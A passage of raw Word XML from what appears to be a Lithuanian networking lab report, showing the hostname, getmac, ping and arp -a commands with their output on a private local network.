              <w:t>PS C:\Users\IT&gt; hostname</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30923871" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Local.host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C193C0E" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio, tinklo adapterių MAC adresu sąrašą;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7610E48A" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F21C6B8" w14:textId="77777777"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PS C:\Users\IT&gt; getmac</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD14E52" w14:textId="52779463"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Physical Address</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Transport Name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21B67296" w14:textId="77777777"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 ==========================================================</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F56B350" w14:textId="08076D39"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00-50-56-C0-00-01</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{761518CA-C621-45BD-8BDE-083305F80C10}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2A078F" w14:textId="3480E0EE"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00-50-56-C0-00-08</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{EA8413A3-DD25-446D-898A-2C47302AF856}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2370F0C3" w14:textId="2BA9E920"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30-9C-23-DF-8D-95</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{69B3BD4B-ADF2-4FF1-9428-7010402F29BB}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED12D66" w14:textId="1A902129"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0A-00-27-00-00-19</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{F87AC024-2249-4A37-9AA0-6AFCE03D63DB}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C7839C" w14:textId="23A95FB9"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7A-79-19-70-62-F6</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{A8A62BA5-3DBC-400C-A82A-EF25A6E0C05A}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="011C7F7E" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Aktyvaus tinklo adapterio MAC adresą;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4F29886C" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D53B3E7" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>30-9C-23-DF-8D-95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="076384EF" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio IP adresą;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7073F8D1" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FEF754E" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C1D4EB5" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rezultatą su komanda PING [tinkle aktyvų IP adresą];</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="10487749" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B613511" w14:textId="77777777" w:rsidR="007467FF"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PS C:\Users\IT&gt; ping 192.168.1.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3DB9AC" w14:textId="77777777" w:rsidR="007467FF"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Pinging 192.168.1.254 with 32 bytes of data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A08D5EC" w14:textId="77777777" w:rsidR="007467FF"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Reply from 192.168.1.254: bytes=32 time&lt;1ms TTL=64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7003A1C9" w14:textId="77777777" w:rsidR="007467FF"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Reply from 192.168.1.254: bytes=32 time&lt;1ms TTL=64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5662A12B" w14:textId="77777777" w:rsidR="007467FF"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Reply from 192.168.1.254: bytes=32 time&lt;1ms TTL=64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20CDBFEC" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Reply from 192.168.1.254: bytes=32 time&lt;1ms TTL=64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4714E7FD" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rezultatą su komanda PING [kito kompiuterio HOSTNAME adresą];</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2C373B0B" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08149ECB" w14:textId="77777777" w:rsidR="007467FF"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PS C:\Users\IT&gt; ping local.host2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1C88F9" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53BF66E9" w14:textId="77777777" w:rsidR="007467FF"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Pinging local.host2 [fe80::245e:f6b0:81a7:beb%18] with 32 bytes of data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70DBEA29" w14:textId="77777777" w:rsidR="007467FF"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Reply from fe80::245e:f6b0:81a7:beb%18: time&lt;1ms</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FB307DA" w14:textId="77777777" w:rsidR="007467FF"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Reply from fe80::245e:f6b0:81a7:beb%18: time&lt;1ms</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524111D5" w14:textId="77777777" w:rsidR="007467FF"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Reply from fe80::245e:f6b0:81a7:beb%18: time&lt;1ms</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2555F7D7" w14:textId="77777777" w:rsidR="007467FF"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Reply from fe80::245e:f6b0:81a7:beb%18: time&lt;1ms</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E11B650" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57C68FF5" w14:textId="77777777"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Ping statistics for fe80::245e:f6b0:81a7:beb%18:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="719A35E6" w14:textId="72739922" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="0066332E" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007467FF" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B41448F" w14:textId="77777777"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Approximate round trip times in milli-seconds:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD3ECFC" w14:textId="778D8557" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="0066332E" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007467FF" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Minimum = 0ms, Maximum = 0ms, Average = 0ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DE0D103" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Panaudokite komandą „arp –a“ ir pateikite tik aktyvaus tinklo adapterio rezultatus;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="66C769B4" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47F5929E" w14:textId="77777777"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Interface: 192.168.1.100 --- 0xd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B977E83" w14:textId="56C9AFA0"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Internet Address</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Physical Address</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4641AE66" w14:textId="0AA2C135"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192.168.1.254</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>00-60-56-C0-00-01</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>dynamic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C134880" w14:textId="043589E0"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192.168.1.100</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>00-60-56-C0-00-08</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>dynamic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B15CDE" w14:textId="64AC1D15"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192.168.1.101</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>30-9C-23-DF-8D-95</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>dynamic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453189B9" w14:textId="0F68545D"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192.168.1.102</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>0A-00-27-00-00-19</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>dynamic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C540E46" w14:textId="343FD75D"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192.168.1.103</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>7A-79-19-70-62-F6</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>dynamic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25302001" w14:textId="213A21B7"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192.168.23.255</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>ff-ff-ff-ff-ff-ff</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
